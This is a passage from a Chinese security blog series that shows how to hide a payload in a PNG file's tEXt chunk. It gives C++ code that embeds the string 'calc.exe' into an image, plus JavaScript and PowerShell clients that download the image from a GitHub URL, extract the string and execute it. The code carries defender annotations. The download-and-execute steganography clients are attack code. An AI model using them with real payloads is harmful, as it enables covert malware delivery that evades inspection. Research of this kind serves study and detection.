隐写技巧——利用PNG文件格式隐藏Payload(四)

关注 2017-01-03 15:13:17 查看数 6705 ,评论数 0 专题
承接《隐写技巧——利用PNG文件格式隐藏Payload(三)》
      Crc^= 0xFFFFFFFF;     

            returnCrc;        

}       

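/*
 * Decode a hexadecimal string into raw bytes.
 *
 * str    - NUL-terminated text holding two hex digits per output byte.
 * UnChar - destination buffer; the caller must provide room for
 *          (strlen(str) + 1) / 2 bytes. Nothing is written past that.
 *
 * A pair that does not parse as hex is stored as 0x00, so every output byte
 * is defined. A trailing single digit (odd-length input) is decoded on its
 * own, matching what the original loop attempted.
 */
void convertStrToUnChar(char* str, unsigned char* UnChar)
{
    size_t total;
    size_t pos;
    size_t counter = 0;
    char pair[3];           /* two digits plus the terminator sscanf needs */
    unsigned int value;

    if (str == NULL || UnChar == NULL)
        return;

    total = strlen(str);
    for (pos = 0; pos < total; pos += 2)
    {
        pair[0] = str[pos];
        /* For odd-length input str[pos + 1] is the string's own NUL. */
        pair[1] = str[pos + 1];
        /* The original scratch buffer was char[2] with no terminator, so
           sscanf read past its end; terminate it explicitly. */
        pair[2] = '\0';

        value = 0;
        if (sscanf(pair, "%02x", &value) != 1)
            value = 0;      /* not hex: store a defined byte, not stale data */

        UnChar[counter] = (unsigned char)value;
        counter++;
    }
}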


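/*
 * Write one PNG chunk of type "tEXt" to fp at the current position:
 * 4-byte big-endian data length, the 4-byte type, the data bytes and a
 * 4-byte CRC field.
 *
 * fp - output stream opened for binary writing; a NULL stream is ignored.
 *
 * The chunk is written piecewise from stack storage. The original version
 * allocated a heap buffer with new[] and never released it.
 *
 * Review notes for anyone inspecting files produced this way:
 *  - The PNG specification defines tEXt data as keyword, NUL separator and
 *    text. The data written here has no separator, so a strict validator can
 *    flag the chunk as malformed.
 *  - The CRC bytes are constants and are not recomputed here; presumably
 *    they were precomputed over the type and data bytes (confirm with the
 *    checker from the earlier parts of this series).
 */
void AddPayload(FILE *fp)
{
    static const char Payload[] = "calc.exe";
    static const unsigned char Crc[4] = {0xFA, 0xC4, 0x08, 0x76};
    unsigned char head[8];
    unsigned int len = (unsigned int)strlen(Payload);

    if (fp == NULL)
        return;

    /* Chunk data length, most significant byte first. */
    head[0] = (unsigned char)((len >> 24) & 0xff);
    head[1] = (unsigned char)((len >> 16) & 0xff);
    head[2] = (unsigned char)((len >> 8) & 0xff);
    head[3] = (unsigned char)(len & 0xff);

    /* Chunk type. */
    head[4] = 't';
    head[5] = 'E';
    head[6] = 'X';
    head[7] = 't';

    /* Stop at the first failed write rather than emit a partial chunk tail. */
    if (fwrite(head, sizeof head, 1, fp) != 1)
        return;
    if (len > 0 && fwrite(Payload, len, 1, fp) != 1)
        return;
    fwrite(Crc, sizeof Crc, 1, fp);
}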


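/*
 * Walk the chunks of c:\test\test.png, print each chunk's name, offset,
 * length and CRC check result, and write c:\test\new.png containing:
 * the PNG signature, every IHDR/PLTE/IDAT chunk copied unchanged, the chunk
 * produced by AddPayload(), and a fixed IEND chunk. All other chunks of the
 * input are dropped.
 *
 * Returns 0 in every case, as the original did.
 *
 * Changes from the original listing:
 *  - The chunk length comes from the file and is now bounded against the
 *    bytes that remain before the trailing 12-byte IEND. Previously an
 *    oversized length made GetCrc32() and fwrite() read past the end of buf,
 *    and 4 + ChunkLen could wrap around.
 *  - Every fread() is checked; a truncated or malformed file ends the run
 *    instead of looping forever waiting for ftell() to reach len - 12.
 *  - The PNG signature is verified and files shorter than 20 bytes are
 *    rejected (len - 12 used to underflow).
 *  - ChunkOffset is advanced per chunk (it was printed as 8 every time).
 *  - Big-endian fields are assembled from unsigned operands, avoiding a
 *    signed left shift into the sign bit.
 *  - A kept chunk's stored CRC is always copied, so a CRC mismatch no longer
 *    leaves a chunk without its CRC field in the output.
 *  - buf and both streams are released on every path.
 */
int main(int argc, char* argv[])
{
    FILE *fp = NULL;
    FILE *fpnew = NULL;
    unsigned char *buf = NULL;
    unsigned char word[4];
    long fileLen = 0;
    unsigned int len = 0;
    unsigned int bodyEnd = 0;      /* offset of the trailing IEND chunk */
    unsigned int avail = 0;
    unsigned int ChunkLen = 0;
    unsigned int ChunkCRC32 = 0;
    unsigned int ChunkOffset = 0;
    unsigned int crc32 = 0;
    unsigned int i = 0;
    int keep = 0;
    unsigned char Signature[8] = {0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a};
    unsigned char IEND[12] = {0x00, 0x00, 0x00, 0x00, 0x49, 0x45, 0x4e, 0x44, 0xae, 0x42, 0x60, 0x82};

    if ((fp = fopen("c:\\test\\test.png", "rb+")) == NULL)
        return 0;
    if ((fpnew = fopen("c:\\test\\new.png", "wb")) == NULL)
    {
        fclose(fp);
        return 0;
    }

    /* 8 signature bytes + 12 IEND bytes is the least this loop can handle. */
    if (fseek(fp, 0, SEEK_END) != 0 || (fileLen = ftell(fp)) < 20)
    {
        printf("[!]Input is too short to be a PNG file\n");
        goto done;
    }
    len = (unsigned int)fileLen;
    bodyEnd = len - 12;

    /* Scratch buffer as large as the file: after the bound check below no
       single chunk can exceed it. */
    buf = new unsigned char[len];

    fseek(fp, 0, SEEK_SET);
    if (fread(buf, 8, 1, fp) != 1 || memcmp(buf, Signature, 8) != 0)
    {
        printf("[!]Missing PNG signature\n");
        goto done;
    }

    printf("TotalLen=%u\n", len);
    printf("----------------------------------------------------\n");

    ChunkOffset = 8;               /* first chunk follows the signature */
    fwrite(Signature, 8, 1, fpnew);

    for (;;)
    {
        i++;

        /* A chunk needs at least length + type + CRC = 12 bytes. */
        avail = bodyEnd - ChunkOffset;
        if (avail < 12 || fread(word, 4, 1, fp) != 1)
        {
            printf("[!]Truncated chunk header\n");
            goto done;
        }
        ChunkLen = ((unsigned int)word[0] << 24) | ((unsigned int)word[1] << 16) |
                   ((unsigned int)word[2] << 8) | (unsigned int)word[3];

        /* Untrusted length: it must fit in what is left before IEND. */
        if (ChunkLen > avail - 12)
        {
            printf("[!]Chunk length exceeds file size\n");
            goto done;
        }

        /* Type (4 bytes) followed by the chunk data. */
        if (fread(buf, 4 + ChunkLen, 1, fp) != 1)
        {
            printf("[!]Truncated chunk data\n");
            goto done;
        }

        printf("[+]ChunkName:%c%c%c%c                 ", buf[0], buf[1], buf[2], buf[3]);

        keep = (strncmp((char *)buf, "IHDR", 4) == 0 ||
                strncmp((char *)buf, "PLTE", 4) == 0 ||
                strncmp((char *)buf, "IDAT", 4) == 0);
        if (keep)
        {
            /* Label kept from the original listing; it is printed for all
               three copied chunk types, not only PLTE. */
            printf("PaletteChunk\n");
            fwrite(word, 4, 1, fpnew);
            fwrite(buf, 4 + ChunkLen, 1, fpnew);
        }
        else
        {
            /* Not copied: the chunk is absent from the output file. */
            printf("AncillaryChunk\n");
        }

        printf("   ChunkOffset:0x%08x       \n", ChunkOffset);
        printf("   ChunkLen: %10u              \n", ChunkLen);

        /* The CRC covers the type and data bytes, not the length field. */
        crc32 = GetCrc32(buf, ChunkLen + 4);
        printf("   ExpectCRC32:%08X\n", crc32);

        if (fread(word, 4, 1, fp) != 1)
        {
            printf("[!]Truncated chunk CRC\n");
            goto done;
        }
        ChunkCRC32 = ((unsigned int)word[0] << 24) | ((unsigned int)word[1] << 16) |
                     ((unsigned int)word[2] << 8) | (unsigned int)word[3];
        printf("   ChunkCRC32: %08X                     ", ChunkCRC32);

        if (crc32 != ChunkCRC32)
            printf("[!]CRC32CheckError!\n");
        else
            printf("CheckSuccess!\n\n");

        /* Copy the stored CRC with the chunk so output framing stays intact. */
        if (keep)
            fwrite(word, 4, 1, fpnew);

        ChunkOffset += 12 + ChunkLen;
        if (ChunkOffset == bodyEnd)
        {
            printf("\n----------------------------------------------------\n");
            printf("TotalChunk:%u\n", i);
            break;
        }
    }

    AddPayload(fpnew);
    fwrite(IEND, 12, 1, fpnew);

done:
    delete[] buf;
    fclose(fp);
    fclose(fpnew);
    return 0;
}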
使用check.cpp对其进行校验,如图,校验成功

07 读取payload并执行

将添加payload的图片上传至github,在客户端实现读取图片解析payload并执行:

1、javascript

// Demonstration client from the article: requests the PNG over HTTPS, treats
// the response as text, cuts out the characters between the "tEXt" marker and
// the "IEND" marker, and passes that string to WScript.Shell.Run.
//
// Defender notes:
//  - This is a download-and-execute pattern. The observable events are a
//    script interpreter creating WinHttp.WinHttpRequest.5.1, an outbound GET
//    for an image URL, and a child process started through WScript.Shell.
//  - The string that gets run is whatever the remote file holds at fetch
//    time; nothing here checks its integrity or origin.
//  - NOTE(review): "newActiveXObject" appears without a space in this
//    listing, presumably an extraction artifact.
h = newActiveXObject("WinHttp.WinHttpRequest.5.1");

h.SetTimeouts(0, 0, 0, 0);

h.Open("GET","https://raw.githubusercontent.com/3gstudent/PNG-Steganography/master//new.png",false);

h.Send();

// Binary image body read through the text accessor.
Data = h.ResponseText;

x=Data.indexOf("tEXt");

y=Data.indexOf("IEND");

// x+4 skips the 4-character chunk type; y-8 stops 8 characters before "IEND".
// indexOf returns -1 when a marker is missing and that case is not handled.
str=Data.substring(x+4,y-8);

// Runs the extracted string as a command line.
newActiveXObject("WScript.Shell").Run(str); 

2、powershell

# Demonstration client from the article: downloads the PNG as a string, cuts
# out the characters between the "tEXt" and "IEND" markers, and passes the
# result to Start-Process.
#
# Defender notes:
#  - Download-and-execute pattern: a System.Net.WebClient download followed by
#    Start-Process on a value derived from the downloaded content.
#  - The started program is whatever the remote file holds at fetch time;
#    nothing here checks its integrity or origin.
$url = 'https://raw.githubusercontent.com/3gstudent/PNG-Steganography/master/new.png'

$request = New-Object System.Net.WebCLient

# Despite the name, $bytes holds a string: DownloadString decodes the body as text.
$bytes = $request.DownloadString($url)

$x=$bytes.indexof("tEXt")

$y=$bytes.indexof("IEND")

# Start after the 4-character chunk type; the length $y-$x-12 ends the slice
# 8 characters before "IEND". A missing marker (index -1) is not handled.
$str=$bytes.Substring($x+4,$y-$x-12)

# Launches the extracted string as a file path.
Start-Process -FilePath $str
注:这里给出两种方法,仅作演示

08 小结

本文详细介绍并分析了PNG文件的格式,编写程序实现了以下功能:自动解析PNG文件格式,辅助查找其中的隐藏内容;添加Payload;下载PNG图片,解析并执行payload。(本专题完)

*来源:RoarTalk 作者:3gstudent Mottoin整理发布
